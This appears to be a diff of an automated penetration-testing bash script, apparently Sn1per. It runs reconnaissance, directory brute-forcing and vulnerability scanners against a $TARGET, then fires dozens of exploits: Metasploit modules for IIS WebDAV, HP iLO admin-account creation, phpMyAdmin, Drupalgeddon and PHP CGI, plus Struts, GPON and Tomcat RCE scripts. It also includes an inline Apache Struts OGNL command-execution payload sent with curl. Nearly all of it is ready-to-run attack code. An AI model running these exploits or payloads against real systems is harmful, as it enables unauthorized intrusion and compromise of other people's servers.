echo -e "$OKRED RUNNING OSCOMMERCE INSTALLER RCE CVE-2018-2628 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use exploit/multi/http/oscommerce_installer_unauth_code_exec; setg RHOST "$TARGET"; setg RPORT "80"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port80-oscommerce_installer_unauth_code_exec.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port80-oscommerce_installer_unauth_code_exec.raw > $LOOT_DIR/output/msf-$TARGET-port80-oscommerce_installer_unauth_code_exec.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port80-oscommerce_installer_unauth_code_exec.raw 2> /dev/null
|
||||
fi
|
||||
fi
|
||||
|
|
@ -1,139 +1,249 @@
|
|||
if [ "$MODE" = "web" ];
|
||||
then
|
||||
if [ "$PASSIVE_SPIDER" = "1" ]; then
|
||||
if [ "$MODE" = "web" ]; then
|
||||
if [ "$BURP_SCAN" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING BURPSUITE SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
if [ "$VERBOSE" == "1" ]; then
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN curl -X POST \"http://$BURP_HOST:$BURP_PORT/v0.1/scan\" -d \"{\"scope\":{\"include\":[{\"rule\":\"https://$TARGET:443\"}],\"type\":\"SimpleScope\"},\"urls\":[\"https://$TARGET:443\"]}\"$RESET"
|
||||
fi
|
||||
curl -s -X POST "http://$BURP_HOST:$BURP_PORT/v0.1/scan" -d "{\"scope\":{\"include\":[{\"rule\":\"https://$TARGET:443\"}],\"type\":\"SimpleScope\"},\"urls\":[\"https://$TARGET:443\"]}"
|
||||
echo ""
|
||||
fi
|
||||
if [ "$PASSIVE_SPIDER" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING PASSIVE WEB SPIDER $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
curl -sX GET "http://index.commoncrawl.org/CC-MAIN-2018-22-index?url=*.$TARGET&output=json" | jq -r .url | sort -u | tee $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null
|
||||
curl -sX GET "http://index.commoncrawl.org/CC-MAIN-2018-22-index?url=*.$TARGET&output=json" | jq -r .url | tee $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null
|
||||
fi
|
||||
if [ "$WAYBACKMACHINE" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED FETCHING WAYBACK MACHINE URLS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
curl -sX GET "http://web.archive.org/cdx/search/cdx?url=*.$TARGET/*&output=text&fl=original&collapse=urlkey" | tee $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null
|
||||
fi
|
||||
|
||||
if [ "$BLACKWIDOW" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING ACTIVE WEB SPIDER & APPLICATION SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
blackwidow -u https://$TARGET -l 3 -s y -v y
|
||||
cat /usr/share/blackwidow/$TARGET*/* >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
blackwidow -u https://$TARGET:443 -l 3 -s y -v n
|
||||
cat /usr/share/blackwidow/$TARGET*/* 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
cat $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
cat $LOOT_DIR/web/weblinks-https-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
cat $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
fi
|
||||
if [ "$WEB_BRUTE_COMMONSCAN" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING COMMON FILE/DIRECTORY BRUTE FORCE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET -w $WEB_BRUTE_COMMON -x 400,403,404,405,406,429,502,503,504 -F -e php,asp,aspx,jsp,pl,cgi,js,css,txt,html,htm
|
||||
fi
|
||||
if [ "$WEB_BRUTE_FULLSCAN" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING FULL FILE/DIRECTORY BRUTE FORCE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET -w $WEB_BRUTE_FULL -x 400,403,404,405,406,429,502,503,504 -F -e php,asp,aspx,jsp,pl,cgi,js,css,txt,html,htm
|
||||
fi
|
||||
if [ "$WEB_BRUTE_EXPLOITSCAN" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING FILE/DIRECTORY BRUTE FORCE FOR VULNERABILITIES $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET -w $WEB_BRUTE_EXPLOITS -x 400,403,404,405,406,429,502,503,504 -F -e html
|
||||
fi
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING FILE/DIRECTORY BRUTE FORCE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET:$PORT -w $WEB_BRUTE_INSANE -x 400,403,404,405,406,429,502,503,504 -F -e php,asp,aspx,bak,zip,tar.gz,html,htm
|
||||
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* 2> /dev/null
|
||||
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* > $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
|
||||
wget https://$TARGET:$PORT/robots.txt -O $LOOT_DIR/web/robots-$TARGET:$PORT-https.txt 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING NMAP HTTP SCRIPTS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
nmap -A -sV -T5 -Pn -p 443 --script=/usr/share/nmap/scripts/iis-buffer-overflow.nse --script=http-vuln* $TARGET
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED ENUMERATING WEB SOFTWARE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
clusterd --ssl -i $TARGET 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING WORDPRESS VULNERABILITY SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
wpscan --url https://$TARGET --disable-tls-checks
|
||||
echo ""
|
||||
wpscan --url https://$TARGET/wordpress/ --disable-tls-checks
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING CMSMAP $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
cmsmap https://$TARGET
|
||||
echo ""
|
||||
cmsmap https://$TARGET/wordpress/
|
||||
echo ""
|
||||
wget https://$TARGET/robots.txt -O $LOOT_DIR/web/robots-$TARGET-https.txt 2> /dev/null
|
||||
if [ "$NMAP_SCRIPTS" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING NMAP HTTP SCRIPTS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
nmap -A -sV -T5 -Pn -p 443 --script=/usr/share/nmap/scripts/iis-buffer-overflow.nse --script=http-vuln* $TARGET | tee $LOOT_DIR/output/nmap-$TARGET-port443
|
||||
sed -r "s/</\&lh\;/g" $LOOT_DIR/output/nmap-$TARGET-port443 2> /dev/null > $LOOT_DIR/output/nmap-$TARGET-port443.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/nmap-$TARGET-port443 2> /dev/null
|
||||
fi
|
||||
if [ "$CLUSTERD" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED ENUMERATING WEB SOFTWARE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
clusterd --ssl -i $TARGET 2> /dev/null | tee $LOOT_DIR/web/clusterd-$TARGET-https.txt
|
||||
fi
|
||||
if [ "$CMSMAP" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING CMSMAP $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
cmsmap https://$TARGET | tee $LOOT_DIR/web/cmsmap-$TARGET-httpsa.txt
|
||||
echo ""
|
||||
cmsmap https://$TARGET/wordpress/ | tee $LOOT_DIR/web/cmsmap-$TARGET-httpsb.txt
|
||||
echo ""
|
||||
fi
|
||||
if [ "$WPSCAN" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING WORDPRESS VULNERABILITY SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
wpscan --url https://$TARGET --no-update --disable-tls-checks 2> /dev/null | tee $LOOT_DIR/web/cmsmap-$TARGET-httpsa.txt
|
||||
echo ""
|
||||
wpscan --url https://$TARGET/wordpress/ --no-update --disable-tls-checks 2> /dev/null | tee $LOOT_DIR/web/cmsmap-$TARGET-httpsb.txt
|
||||
fi
|
||||
if [ "$NIKTO" = "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING WEB VULNERABILITY SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
nikto -h https://$TARGET -output $LOOT_DIR/web/nikto-$TARGET-https.txt
|
||||
fi
|
||||
if [ "$SHOCKER" = "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING SHELLSHOCK EXPLOIT SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
python $PLUGINS_DIR/shocker/shocker.py -H $TARGET --cgilist $PLUGINS_DIR/shocker/shocker-cgi_list --ssl --port 443 | tee $LOOT_DIR/web/shocker-$TARGET-port443.txt
|
||||
fi
|
||||
if [ "$JEXBOSS" = "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING JEXBOSS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
cd /tmp/
|
||||
python /usr/share/sniper/plugins/jexboss/jexboss.py -u https://$TARGET | tee $LOOT_DIR/web/jexboss-$TARGET-port443.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/jexboss-$TARGET-port443.raw > $LOOT_DIR/web/jexboss-$TARGET-port443.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/web/jexboss-$TARGET-port443.raw 2> /dev/null
|
||||
cd $INSTALL_DIR
|
||||
fi
|
||||
cd $INSTALL_DIR
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING HTTP PUT UPLOAD SCANNER $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use scanner/http/http_put; setg RHOSTS "$TARGET"; setg RPORT "443"; setg SSL true; run; set PATH /uploads/; run; exit;"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING WEBDAV SCANNER $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use scanner/http/webdav_scanner; setg RHOSTS "$TARGET"; setg RPORT "443"; setg SSL true; run; use scanner/http/webdav_website_content; run; exit;"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING MICROSOFT IIS WEBDAV ScStoragePathFromUrl OVERFLOW $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use exploit/windows/iis/iis_webdav_scstoragepathfromurl; setg RHOST "$TARGET"; setg RPORT "443"; setg SSL true; run; exit;"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING APACHE TOMCAT UTF8 TRAVERSAL EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use admin/http/tomcat_utf8_traversal; setg RHOSTS "$TARGET"; setg RPORT "443"; set SSL true; run; exit;"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING APACHE OPTIONS BLEED EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use scanner/http/apache_optionsbleed; setg RHOSTS "$TARGET"; setg RPORT "443"; set SSL true; run; exit;"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING HP ILO AUTH BYPASS EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use admin/hp/hp_ilo_create_admin_account; setg RHOST "$TARGET"; setg RPORT "443"; set SSL true; run; exit;"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING MS15-034 SYS MEMORY DUMP METASPLOIT EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use auxiliary/scanner/http/ms15_034_http_sys_memory_dump; setg RHOSTS \"$TARGET\"; set RPORT 443; set SSL true; set WAIT 2; run; exit;"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING BADBLUE PASSTHRU METASPLOIT EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use exploit/windows/http/badblue_passthru; setg RHOST \"$TARGET\"; set RPORT 443; set SSL true; run; back;exit;"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING PHP CGI ARG INJECTION METASPLOIT EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use exploit/multi/http/php_cgi_arg_injection; setg RHOST \"$TARGET\"; set RPORT 443; set SSL true; run; back;exit;"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING JOOMLA COMFIELDS SQL INJECTION METASPLOIT EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use unix/webapp/joomla_comfields_sqli_rce; setg RHOST \"$TARGET\"; set RPORT 443; set SSL true; run; back;exit;"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING PHPMYADMIN METASPLOIT EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use exploit/multi/http/phpmyadmin_3522_backdoor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; setg RPORT 443; run; use exploit/unix/webapp/phpmyadmin_config; run; use multi/http/phpmyadmin_preg_replace; run; exit;"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING SHELLSHOCK EXPLOIT SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
python $PLUGINS_DIR/shocker/shocker.py -H $TARGET --cgilist $PLUGINS_DIR/shocker/shocker-cgi_list --port 443 --ssl
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING APACHE STRUTS 2 CVE-2017-5638 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
python $INSTALL_DIR/bin/apache_struts_cve-2017-5638.py -u https://$TARGET
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING APACHE STRUTS 2 CVE-2017-9805 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
python $INSTALL_DIR/bin/apache_struts_cve-2017-9805.py -u https://$TARGET
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING APACHE JAKARTA RCE EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
curl -s -H "Content-Type: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}" https://$TARGET | head -n 1
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING APACHE STRUTS 2 CVE-2018-11776 RCE EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
python $INSTALL_DIR/bin/apache-struts-CVE-2018-11776.py -u https://$TARGET
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING DRUPALGEDDON2 CVE-2018-7600 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
ruby $INSTALL_DIR/bin/drupalgeddon2.rb https://$TARGET
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING CISCO ASA TRAVERSAL CVE-2018-0296 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
python $INSTALL_DIR/bin/cisco-asa-traversal.py https://$TARGET:$PORT
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING JEXBOSS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
cd /tmp/
|
||||
python /usr/share/sniper/plugins/jexboss/jexboss.py -u https://$TARGET
|
||||
cd $INSTALL_DIR
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING GPON ROUTER EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
python $INSTALL_DIR/bin/gpon_rce.py https://$TARGET:$PORT 'whoami'
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING APACHE TOMCAT CVE-2017-12617 RCE EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
python $INSTALL_DIR/bin/tomcat-cve-2017-12617.py -u https://$TARGET
|
||||
|
||||
fi
|
||||
if [ "$METASPLOIT_EXPLOIT" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING HTTP PUT UPLOAD SCANNER $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use scanner/http/http_put; setg RHOSTS "$TARGET"; setg RPORT "443"; set SSL true; setg SSL false; run; set PATH /uploads/; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port443-http_put.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port443-http_put.raw > $LOOT_DIR/output/msf-$TARGET-port443-http_put.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port443-http_put.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING WEBDAV SCANNER $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use scanner/http/webdav_scanner; setg RHOSTS "$TARGET"; setg RPORT "443"; set SSL true; setg SSL false; run; use scanner/http/webdav_website_content; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port443-webdav_website_content.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port443-webdav_website_content.raw > $LOOT_DIR/output/msf-$TARGET-port443-webdav_website_content.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port443-webdav_website_content.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING MICROSOFT IIS WEBDAV ScStoragePathFromUrl OVERFLOW $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use exploit/windows/iis/iis_webdav_scstoragepathfromurl; setg RHOST "$TARGET"; setg RPORT "443"; set SSL true; setg SSL false; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port443-iis_webdav_scstoragepathfromurl.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port443-iis_webdav_scstoragepathfromurl.raw > $LOOT_DIR/output/msf-$TARGET-port443-iis_webdav_scstoragepathfromurl.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port443-iis_webdav_scstoragepathfromurl.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING APACHE TOMCAT UTF8 TRAVERSAL EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use admin/http/tomcat_utf8_traversal; setg RHOSTS "$TARGET"; setg RPORT "443"; set SSL true; set SSL false; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port443-tomcat_utf8_traversal.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port443-tomcat_utf8_traversal.raw > $LOOT_DIR/output/msf-$TARGET-port443-tomcat_utf8_traversal.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port443-tomcat_utf8_traversal.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING APACHE OPTIONS BLEED EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use scanner/http/apache_optionsbleed; setg RHOSTS "$TARGET"; setg RPORT "443"; set SSL true; set SSL false; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port443-apache_optionsbleed.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port443-apache_optionsbleed.raw > $LOOT_DIR/output/msf-$TARGET-port443-apache_optionsbleed.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port443-apache_optionsbleed.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING HP ILO AUTH BYPASS EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use admin/hp/hp_ilo_create_admin_account; setg RHOST "$TARGET"; setg RPORT "443"; set SSL true; set SSL false; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET--port80-hp_ilo_create_admin_account.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET--port80-hp_ilo_create_admin_account.raw > $LOOT_DIR/output/msf-$TARGET--port80-hp_ilo_create_admin_account.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET--port80-hp_ilo_create_admin_account.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING DRUPALGEDDON HTTP PARAMETER SQL INJECTION CVE-2014-3704 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use exploit/multi/http/drupal_drupageddon; setg RHOST "$TARGET"; setg RPORT "443"; set SSL true; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port443-drupal_drupageddon.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port443-drupal_drupageddon.raw > $LOOT_DIR/output/msf-$TARGET-port443-drupal_drupageddon.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port443-drupal_drupageddon.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING MS15-034 SYS MEMORY DUMP METASPLOIT EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use auxiliary/scanner/http/ms15_034_http_sys_memory_dump; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; set WAIT 2; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port443-ms15_034_http_sys_memory_dump.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port443-ms15_034_http_sys_memory_dump.raw > $LOOT_DIR/output/msf-$TARGET-port443-ms15_034_http_sys_memory_dump.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port443-ms15_034_http_sys_memory_dump.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING BADBLUE PASSTHRU METASPLOIT EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use exploit/windows/http/badblue_passthru; setg RHOST "$TARGET"; set RPORT 80; run; back;exit;" | tee $LOOT_DIR/output/msf-$TARGET--port80-badblue_passthru.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET--port80-badblue_passthru.raw > $LOOT_DIR/output/msf-$TARGET--port80-badblue_passthru.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET--port80-badblue_passthru.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING PHP CGI ARG INJECTION METASPLOIT EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use exploit/multi/http/php_cgi_arg_injection; setg RHOST "$TARGET"; set RPORT 80; run; back;exit;" | tee $LOOT_DIR/output/msf-$TARGET-port443-php_cgi_arg_injection.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port443-php_cgi_arg_injection.raw > $LOOT_DIR/output/msf-$TARGET-port443-php_cgi_arg_injection.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port443-php_cgi_arg_injection.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING PHPMYADMIN METASPLOIT EXPLOITS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use exploit/multi/http/phpmyadmin_3522_backdoor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use exploit/unix/webapp/phpmyadmin_config; run; use multi/htp/phpmyadmin_preg_replace; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port443-phpmyadmin_3522_backdoor.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port443-phpmyadmin_3522_backdoor.raw > $LOOT_DIR/output/msf-$TARGET-port443-phpmyadmin_3522_backdoor.txt 2> /dev/null
|
||||
